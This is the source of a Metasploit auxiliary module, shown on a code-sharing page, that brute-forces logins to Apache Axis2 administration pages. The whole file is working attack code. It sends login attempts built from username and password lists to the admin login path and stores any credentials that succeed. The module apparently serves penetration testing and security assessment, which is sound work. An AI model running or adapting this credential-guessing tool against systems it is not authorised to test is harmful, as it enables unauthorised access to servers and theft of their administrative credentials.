Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/http/axis_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/login_scanner/axis2'

7
require 'metasploit/framework/credential_collection'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::HttpClient

11
  include Msf::Auxiliary::AuthBrute

12
  include Msf::Auxiliary::Report

13
  include Msf::Auxiliary::Scanner

14


15
  def initialize

16
    super(

17
      'Name' => 'Apache Axis2 Brute Force Utility',

18
      'Description' => %q{

19
        This module attempts to login to an Apache Axis2 instance using

20
        username and password combinations indicated by the USER_FILE,

21
        PASS_FILE, and USERPASS_FILE options. It has been verified to

22
        work on at least versions 1.4.1 and 1.6.2.

23
      },

24
      'Author' => [

25
        'Leandro Oliveira <leandrofernando[at]gmail.com>'

26
      ],

27
      'References' => [

28
        [ 'CVE', '2010-0219' ],

29
        [ 'OSVDB', '68662'],

30
      ],

31
      'License' => MSF_LICENSE

32
    )

33


34
    register_options([

35
      Opt::RPORT(8080),

36
      OptString.new('TARGETURI', [false, 'Path to the Apache Axis Administration page', '/axis2/axis2-admin/login']),

37
    ])

38
  end

39


40
  # For print_* methods

41
  def target_url

42
    "http://#{vhost}:#{rport}#{datastore['URI']}"

43
  end

44


45
  def run_host(ip)

46
    uri = normalize_uri(target_uri.path)

47


48
    print_status("Verifying login exists at #{target_url}")

49
    begin

50
      send_request_cgi({

51
        'method' => 'GET',

52
        'uri' => uri

53
      }, 20)

54
    rescue => e

55
      print_error("Failed to retrieve Axis2 login page at #{target_url}")

56
      print_error("Error: #{e.class}: #{e}")

57
      return

58
    end

59


60
    print_status "#{target_url} - Apache Axis - Attempting authentication"

61


62
    cred_collection = build_credential_collection(

63
      username: datastore['USERNAME'],

64
      password: datastore['PASSWORD']

65
    )

66


67
    scanner = Metasploit::Framework::LoginScanner::Axis2.new(

68
      configure_http_login_scanner(

69
        uri: uri,

70
        cred_details: cred_collection,

71
        stop_on_success: datastore['STOP_ON_SUCCESS'],

72
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

73
        connection_timeout: 5,

74
        http_username: datastore['HttpUsername'],

75
        http_password: datastore['HttpPassword']

76
      )

77
    )

78


79
    scanner.scan! do |result|

80
      credential_data = result.to_h

81
      credential_data.merge!(

82
        module_fullname: self.fullname,

83
        workspace_id: myworkspace_id

84
      )

85
      case result.status

86
      when Metasploit::Model::Login::Status::SUCCESSFUL

87
        print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"

88
        credential_core = create_credential(credential_data)

89
        credential_data[:core] = credential_core

90
        create_credential_login(credential_data)

91
        :next_user

92
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT

93
        if datastore['VERBOSE']

94
          print_brute :level => :verror, :ip => ip, :msg => "Could not connect"

95
        end

96
        invalidate_login(credential_data)

97
        :abort

98
      when Metasploit::Model::Login::Status::INCORRECT

99
        if datastore['VERBOSE']

100
          print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"

101
        end

102
        invalidate_login(credential_data)

103
      end

104
    end

105
  end

106


107
end

108


109